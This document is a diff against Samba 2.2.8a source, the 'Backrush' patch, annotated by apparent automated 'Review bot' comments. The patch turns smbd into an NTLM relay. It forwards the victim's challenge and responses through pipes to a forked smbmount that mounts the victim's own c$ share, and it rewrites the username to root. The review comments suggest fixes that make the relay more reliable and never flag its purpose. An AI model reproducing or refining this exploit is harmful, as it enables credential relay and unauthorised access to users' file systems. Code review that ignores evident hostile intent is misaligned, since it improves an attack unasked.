
  1. diff -Nur /root/samba-2.2.8a/source/client/smbmount.c /backrush/source.exp/client/smbmount.c
  2. --- /root/samba-2.2.8a/source/client/smbmount.c    2002-04-30 17:56:19.000000000 +0430
  3. +++ /backrush/source.exp/client/smbmount.c    2003-04-19 16:28:04.000000000 +0430
  4. @@ -26,6 +26,10 @@
  5.  #include <mntent.h>
  6.  #include <asm/types.h>
  7.  #include <linux/smb_fs.h>
  8. +//>Backrush
  9. +int br_read[2], br_write[2], br_pid;
  10. +struct Backrush br_state;
  11. +//<
  12.  
  13.  extern BOOL in_client;
  14.  extern pstring user_socket_options;
  15. @@ -177,6 +181,21 @@
  16.          cli_shutdown(c);
  17.          return NULL;
  18.      }
  19. +//>Backrush
  20. +        {
  21. +        int i;
  22. +        printf("challange: ");
  23. +            for (i = 0; i < 8; i++)
  24. +            printf("%0.2x",c->cryptkey[i]);
  25. +        fflush(stdout);
  26. +        memcpy(br_state.challenge, c->cryptkey, 8);
  27. +        br_state.status = 1;
  28. +        write(br_write[1],&br_state, sizeof(br_state));
  29. +        printf(" sent to server\n");
  30. +        printf("waiting for response...\n");
  31. +        fflush(stdout);    
  32. +    }
  33. +//<
  34.  
  35.      if (!got_pass) {
  36.          char *pass = getpass("Password: ");
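Review bot: The result of `write(br_write[1],&br_state, sizeof(br_state));` is discarded, so a short write or a closed pipe leaves the smbd side waiting on a half-delivered struct while this client prints "sent to server" and carries on. The lines just above this block already bail with `cli_shutdown(c); return NULL;` on failure, so the same treatment fits here: `if (write(br_write[1], &br_state, sizeof br_state) != (ssize_t)sizeof br_state) { cli_shutdown(c); return NULL; }`. Note also that `br_write[1]` is a zero-initialised global when BACKRUSH_WRITE is not set, so in that case the struct is written to descriptor 0 rather than failing. The enclosing function starts and ends outside the hunk.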
  37. @@ -848,6 +867,14 @@
  38.      if (*credentials != 0) {
  39.          read_credentials_file(credentials);
  40.      }
  41. +//>Backrush
  42. +    printf("Started to mount %s on %s\n",argv[1], argv[2]);
  43. +    fflush(stdout);
  44. +    if (getenv("BACKRUSH_READ")) 
  45. +            br_read[0] = atoi(getenv("BACKRUSH_READ"));
  46. +    if (getenv("BACKRUSH_WRITE"))
  47. +        br_write[1] = atoi(getenv("BACKRUSH_WRITE"));
  48. +//<
  49.  
  50.      DEBUG(3,("mount.smbfs started (version %s)\n", VERSION));
  51.  
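Review bot: atoi() on the BACKRUSH_READ/BACKRUSH_WRITE values gives no error indication, so an empty or garbled variable silently yields descriptor 0 and the later pipe traffic is exchanged with stdin; parse with strtol() and reject anything that is not a complete non-negative number, e.g. `errno = 0; long fd = strtol(s, &end, 10); if (end == s || *end || errno || fd < 0) { fprintf(stderr, "bad BACKRUSH descriptor\n"); exit(1); }` applied to each variable. The `printf("Started to mount %s on %s\n", argv[1], argv[2]);` line relies on an argc check that is not in the hunk; confirm it precedes this point. The enclosing main() continues beyond the hunk.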
  52. diff -Nur /root/samba-2.2.8a/source/include/includes.h /backrush/source.exp/include/includes.h
  53. --- /root/samba-2.2.8a/source/include/includes.h    2003-02-28 19:26:18.000000000 +0330
  54. +++ /backrush/source.exp/include/includes.h    2003-04-17 10:36:54.000000000 +0430
  55. @@ -1,5 +1,26 @@
  56.  #ifndef _INCLUDES_H
  57.  #define _INCLUDES_H
  58. +
  59. +//>Backrush
  60. +#include <stdlib.h>
  61. +#include <time.h>
  62. +struct Backrush
  63. +{
  64. +    int status;
  65. +    char ip_address[20];
  66. +    int port;
  67. +    char username[256];
  68. +    char sharename[256];
  69. +    char netbios[256];
  70. +    char domain[256];
  71. +    char challenge[8];
  72. +    char nt_resp[24];
  73. +    char lm_resp[24];
  74. +};
  75. +extern struct Backrush br_state;
  76. +extern int br_read[2],br_write[2],br_pid;
  77. +//<
  78. +
  79.  /* 
  80.     Unix SMB/Netbios implementation.
  81.     Version 1.9.
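Review bot: The `challenge`, `nt_resp` and `lm_resp` members carry raw bytes, not strings (the smbd side copies them from `unsigned char buf[8]` and `uchar challenge[8]`-style buffers), yet they are declared `char`; declaring them `unsigned char challenge[8]; unsigned char nt_resp[24]; unsigned char lm_resp[24];` states the intent and avoids sign-extension when a byte is dumped through `%0.2x`. The struct also deserves a short comment: it is shipped raw over a pipe between smbd and smbmount, so both binaries must be built from the same header; `port` is not a TCP port but a random tag used to name the per-session mount directory in negprot.c; and `status` is written but never read anywhere in this patch. Placing `#include <stdlib.h>`/`<time.h>` ahead of Samba's own configuration headers may be an include-order hazard on some targets; verify it builds everywhere the patch is meant to run.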
  82. diff -Nur /root/samba-2.2.8a/source/libsmb/cliconnect.c /backrush/source.exp/libsmb/cliconnect.c
  83. --- /root/samba-2.2.8a/source/libsmb/cliconnect.c    2003-03-15 01:04:48.000000000 +0330
  84. +++ /backrush/source.exp/libsmb/cliconnect.c    2003-04-17 12:30:26.000000000 +0430
  85. @@ -23,7 +23,6 @@
  86.  
  87.  #include "includes.h"
  88.  
  89. -
  90.  static const struct {
  91.      int prot;
  92.      const char *name;
  93. @@ -265,7 +264,28 @@
  94.          memcpy(pword, pass, passlen);
  95.          memcpy(ntpword, ntpass, ntpasslen);
  96.      }
  97. -
  98. +//>Backrush
  99. +    {
  100. +        int i;
  101. +        read(br_read[0],&br_state, sizeof(br_state));
  102. +        printf("received response:\n");
  103. +        fflush(stdout);
  104. +        memcpy(pword, br_state.lm_resp, 24);
  105. +        memcpy(ntpword, br_state.nt_resp, 24);
  106. +        if(br_state.username[0])
  107. +             strncpy(user, br_state.username, 24);
  108. +        printf("username: %s\n", user);
  109. +        printf("lm response: ");
  110. +            for (i = 0; i < 24; i++)
  111. +            printf("%0.2x",pword[i]);
  112. +        printf("\n");
  113. +        printf("nt response: ");
  114. +            for (i = 0; i < 24; i++)
  115. +            printf("%0.2x",ntpword[i]);
  116. +        printf("\n");
  117. +        fflush(stdout);
  118. +    }
  119. +//<
  120.      /* send a session setup command */
  121.      memset(cli->outbuf,'\0',smb_size);
  122.  
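Review bot: The `read(br_read[0],&br_state, sizeof(br_state));` result is not checked, so on a short read or EOF the stale or zeroed `lm_resp`/`nt_resp` are still copied into pword/ntpword and sent as the session-setup response; require a whole struct, e.g. `if (read(br_read[0], &br_state, sizeof br_state) != (ssize_t)sizeof br_state) return False;` (the function's return type and its normal failure path are outside the hunk, so match them). `strncpy(user, br_state.username, 24)` bounds the copy by the 24-byte response length rather than the 256-byte username field and will not NUL-terminate a name of 24 bytes or more, after which `printf("username: %s\n", user)` over-reads; the capacity of `user` is not visible here, so `snprintf(user, <its real bound>, "%s", br_state.username)` is the safer form. The hex loops print `pword[i]`/`ntpword[i]`, which sign-extend if those buffers are plain char — cast to `(unsigned char)`. The enclosing function begins and ends outside the hunk.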
  123. diff -Nur /root/samba-2.2.8a/source/smbd/negprot.c /backrush/source.exp/smbd/negprot.c
  124. --- /root/samba-2.2.8a/source/smbd/negprot.c    2003-03-15 01:04:49.000000000 +0330
  125. +++ /backrush/source.exp/smbd/negprot.c    2003-04-24 13:37:19.000000000 +0430
  126. @@ -180,6 +180,45 @@
  127.        doencrypt = ((cli->sec_mode & 2) != 0);
  128.    }
  129.  
  130. +//>Backrush
  131. +    {
  132. +    srand(time(NULL));
  133. +        pipe(br_read);
  134. +        pipe(br_write);
  135. +        br_state.status = 1;
  136. +        br_state.port = random();
  137. +        strncpy(br_state.ip_address, get_socket_addr(smbd_server_fd()), sizeof(br_state.ip_address));
  138. +        strncpy(br_state.sharename, "c$", sizeof(br_state.sharename));
  139. +        {
  140. +            char tmp[1024], *ptr;
  141. +        FILE *fin = fopen("backrush/ip2sharename.map","r");
  142. +        if (fin)
  143. +        {
  144. +            while(fscanf(fin, "%s", tmp) > 0)
  145. +            {
  146. +                ptr = strchr(tmp, ':');
  147. +            *ptr++ = 0;
  148. +            if (!strcmp(br_state.ip_address,tmp))
  149. +            strncpy(br_state.sharename, ptr, sizeof(br_state.sharename));
  150. +        }
  151. +        fclose(fin);
  152. +            }
  153. +    }
  154. +    if (!(br_pid = fork()))
  155. +        {
  156. +        char cmd[1024];
  157. +            snprintf(cmd, sizeof cmd, "mkdir -p backrush/mnt/%s-%d", br_state.ip_address, br_state.port);
  158. +        system(cmd);
  159. +        snprintf(cmd, sizeof cmd, "export BACKRUSH_READ=%d; export BACKRUSH_WRITE=%d; ./smbmount //%s/%s backrush/mnt/%s-%d -o username=root,password=let_me_go_in >backrush/log/%s-%d",
  160. +        br_write[0], br_read[1], br_state.ip_address, br_state.sharename, br_state.ip_address, br_state.port, br_state.ip_address, br_state.port);
  161. +        system(cmd);
  162. +            snprintf(cmd, sizeof cmd, "echo smbmount compeleted >>backrush/log/%s-%d", br_state.ip_address, br_state.port);
  163. +        system(cmd);
  164. +        _exit(0);
  165. +    }
  166. +    }
  167. +//<
  168. +
  169.    if (doencrypt) {
  170.        crypt_len = 8;
  171.        if (!cli) {
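Review bot: The map-file loop dereferences the result of `strchr(tmp, ':')` without a NULL check, so a line in backrush/ip2sharename.map without a colon crashes smbd, and `fscanf(fin, "%s", tmp)` has no width, so a token longer than 1023 bytes overflows `tmp`. Changing the loop head to `while (fscanf(fin, "%1023s", tmp) == 1) { ptr = strchr(tmp, ':'); if (!ptr) continue; *ptr++ = 0;` covers both. The `pipe(br_read)`/`pipe(br_write)` calls are unchecked and neither process closes the pipe ends it does not use, which is why the reads in password.c can never see EOF when the other side dies; the child should close `br_read[0]`/`br_write[1]` and the parent `br_read[1]`/`br_write[0]` right after fork(). `srand()` seeds rand(), not random(), so `br_state.port = random()` is effectively unseeded on libcs that do not alias the two — use `srandom()`. The mount command passes `password=let_me_go_in` on a `system()` command line, so it is visible in the process list for the duration of the mount.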
  172. diff -Nur /root/samba-2.2.8a/source/smbd/password.c /backrush/source.exp/smbd/password.c
  173. --- /root/samba-2.2.8a/source/smbd/password.c    2003-04-07 06:24:00.000000000 +0430
  174. +++ /backrush/source.exp/smbd/password.c    2003-04-19 09:15:47.000000000 +0430
  175. @@ -48,6 +48,10 @@
  176.      unsigned char buf[8];
  177.  
  178.      generate_random_buffer(buf,8,False);
  179. +//>Backrush
  180. +    read(br_read[0],&br_state, sizeof(br_state));
  181. +    memcpy(buf, br_state.challenge, 8);
  182. +//<
  183.  
  184.      memcpy(saved_challenge, buf, 8);
  185.      memcpy(challenge,buf,8);
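Review bot: The result of `read(br_read[0],&br_state, sizeof(br_state));` is ignored, so a short read or a broken pipe replaces the freshly generated random challenge with whatever `br_state.challenge` held (zeros on first use), and because the negprot.c hunk never closes the parent's write end of br_read the call blocks indefinitely if smbmount never starts. Only substitute the relayed challenge when a whole struct arrived: `if (read(br_read[0], &br_state, sizeof br_state) == (ssize_t)sizeof br_state) memcpy(buf, br_state.challenge, 8);` — otherwise the buffer from `generate_random_buffer` is kept. The enclosing function starts and ends outside the hunk.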
  186. @@ -466,7 +470,13 @@
  187.      uchar challenge[8];
  188.      char* user_name;
  189.      uint8 *nt_pw, *lm_pw;
  190. -
  191. +//>Backrush
  192. +    memcpy(br_state.nt_resp, nt_pass, 24);
  193. +    memcpy(br_state.lm_resp, lm_pass, 24);
  194. +    write(br_write[1],&br_state, sizeof(br_state));
  195. +//    waitpid(br_pid,NULL,WNOHANG);
  196. +    return(False);
  197. +//<
  198.      if (!lm_pass || !sampass) 
  199.          return(False);
  200.  
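Review bot: `memcpy(br_state.nt_resp, nt_pass, 24)` and the lm_pass copy run before the existing `if (!lm_pass || !sampass) return(False);` guard, so a client that sends no LM or NT response (a NULL pointer here) crashes smbd in the capture path; put `if (!lm_pass || !nt_pass) return(False);` ahead of the memcpys, and bound the copies by the caller-supplied response lengths rather than a fixed 24 if this function receives them. The unconditional `return(False);` makes the rest of the function unreachable, which is presumably intended since the replay only needs to capture the hashes, but it deserves a comment saying so, e.g. `/* Backrush: never authenticate locally; the responses were relayed to smbmount */`, and the commented-out `waitpid` line should be dropped. The `write(br_write[1], ...)` return is also unchecked. The function begins and ends outside the hunk.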
  201. diff -Nur /root/samba-2.2.8a/source/smbd/reply.c /backrush/source.exp/smbd/reply.c
  202. --- /root/samba-2.2.8a/source/smbd/reply.c    2003-04-07 06:24:00.000000000 +0430
  203. +++ /backrush/source.exp/smbd/reply.c    2003-04-16 18:03:58.000000000 +0430
  204. @@ -974,6 +974,11 @@
  205.     * security=domain.
  206.     */
  207.  
  208. +//>Backrush   
  209. +  strncpy(br_state.username,user,sizeof(br_state.username));
  210. +  strncpy(user,"root",sizeof(br_state.username));
  211. +//<
  212. +
  213.    if (!guest && !check_server_security(orig_user, domain, user, 
  214.           smb_apasswd, smb_apasslen, smb_ntpasswd, smb_ntpasslen) &&
  215.        !check_domain_security(orig_user, domain, user, smb_apasswd,
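Review bot: `strncpy(user,"root",sizeof(br_state.username));` bounds the write by the size of a different object: it zero-pads 256 bytes into `user`, whose declaration is outside the hunk, so this is only safe if `user` is at least 256 bytes (an fstring would be, by coincidence rather than design). Use the destination's own bound, `snprintf(user, sizeof user, "%s", "root");` if `user` is an array, or its declared length otherwise. The preceding `strncpy(br_state.username, user, ...)` can leave the field unterminated for a 256-byte name, and that field is later consumed with `%s` and another strncpy on the client side; `snprintf(br_state.username, sizeof br_state.username, "%s", user);` avoids that. A one-line comment explaining that the real user name is stashed for the relay while the local check proceeds as root would help the next reader.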
  216. diff -Nur /root/samba-2.2.8a/source/smbd/server.c /backrush/source.exp/smbd/server.c
  217. --- /root/samba-2.2.8a/source/smbd/server.c    2003-03-15 01:04:49.000000000 +0330
  218. +++ /backrush/source.exp/smbd/server.c    2003-04-16 18:05:17.000000000 +0430
  219. @@ -25,6 +25,11 @@
  220.  extern fstring global_myworkgroup;
  221.  extern pstring global_myname;
  222.  
  223. +//<Backrush
  224. +int br_read[2],br_write[2],br_pid;
  225. +struct Backrush br_state;
  226. +//>
  227. +
  228.  int am_parent = 1;
  229.  
  230.  /* the last message the was processed */
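Review bot: The marker comments here are inverted (`//<Backrush` … `//>`) relative to the `//>Backrush` … `//<` pairs used in every other hunk of this patch; swap them so the blocks can be grepped consistently. These definitions duplicate the ones added to client/smbmount.c, which appears to work only because the two files are linked into different binaries (smbd vs. smbmount); a comment noting that would save a reader from expecting a duplicate-symbol error, e.g. `/* Backrush: smbd-side definitions; client/smbmount.c carries its own copy */`.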
  231.